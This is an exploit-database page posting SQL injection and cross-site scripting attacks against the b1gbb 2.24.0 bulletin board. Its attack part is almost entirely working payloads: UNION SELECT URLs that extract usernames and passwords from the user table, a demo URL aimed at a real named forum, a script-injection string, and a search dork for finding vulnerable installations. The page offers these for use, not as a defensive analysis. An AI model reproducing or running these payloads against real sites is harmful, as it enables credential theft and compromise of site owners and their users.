[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

b1gbb 2.24.0 (SQL Injection / XSS) Remote Vulnerabilities

Author
GoLd_M
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1985
Category
web applications
Date add
27-06-2007
Platform
unsorted
=========================================================
b1gbb 2.24.0 (SQL Injection / XSS) Remote Vulnerabilities
=========================================================



# b1gbb 2.24.0 (SQL/XSS) Remote Vulnerabilities

# D.Script :
     http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip

# Exploits SQL :
     
//showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
     OR
     
/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
     Demo
     
http://www.gkovacs.de/forum/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*

# Exploit XSS :
     /visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

# Dork:
       "powered by b1gBB (b1g Bulletion Board)"


# Discovered by:
       GoLd_M = [Mahmood_ali] & t0pP8uZz



#  0day.today [2024-12-25]  #